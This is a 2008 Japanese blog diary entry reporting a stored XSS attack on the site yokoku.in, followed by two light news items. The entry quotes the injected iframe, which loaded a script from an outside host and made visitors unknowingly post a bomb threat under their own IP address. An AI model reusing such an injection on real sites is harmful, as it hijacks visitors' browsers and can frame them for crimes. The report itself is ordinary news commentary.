トップ «前の日記(2008/08/02(Sat)) 最新 次の日記(2008/08/04(Mon))» 編集

糸の切れた(たこ) ( a threadless kite )

ここは、管理人yamagataが方針未定のまま、何となーく思いついたことを思いついたままにだらだらと書き付ける日記帳です。ふんわりほんわかな感じでお願いします。



2008/08/03(Sun) 日曜日ー。(「33分探偵」、なかなか笑えたw

[出来事] 予告.inがクロスサイトスクリプティング攻撃を受けたっぽい (あぷ速)

予告.in に Stored XSS の脆弱性。 下記のように IFRAME を仕込まれてしまったらしい。

<a href=/detail?num=3882>■</a>test <a href=http://a.a/><iframe/src='
//a.zz.tc/8/'><font size=1 color=#777777></a></font></a></div> 

これにより、yokoku.in を見に行った瞬間に、勝手に 2ch に、警視庁を爆破するという犯行予告が、IPアドレス付き(fusianasan)で書き込まれるような仕掛けになっていたらしい。(-_-;

    [追記]  ・予告inに、犯行予告を通報すると「警視庁を爆破する」という犯行予告してしまうスクリプトが埋め込まれる (デジタルマガジン)

    クロスサイトスクリプティング攻撃とは、…簡単に説明すると、サイト「A」にコメントを投稿すると、自動的にサイト「B」にもコメントが投稿されてしまうことを言う。

    ↑ この部分は、何だかちょっと “おしい” 感じの要約。(^-^;

      [追記]  ・予告inにおけるXSS脆弱性、及び被害の概要について (yokoku.in)

      原因: 犯行予告通報フォームのURL部分のエスケープ処理(不正な文字列を無効化する処理)を行っていませんでした。

      ↑ また、今回の経緯を警視庁、ハイテク犯罪センターに連絡済みとのこと。

      [雑談] ワンダーフェスティバル2008、4階から1階へエスカレータが逆流 (GIGAZINE)

      東京ビッグサイトでエスカレータが故障。 ゴゴゴゴ!と轟音を発して逆流、けが人が発生。

      [雑談] メイドさん、巫女さんらが集まった「うち水っ娘大集合!2008」 (GIGAZINE)

      巫女さんはコスプレじゃなくて本物らしいですw ...さすがに気温43.9度は無いでしょ?!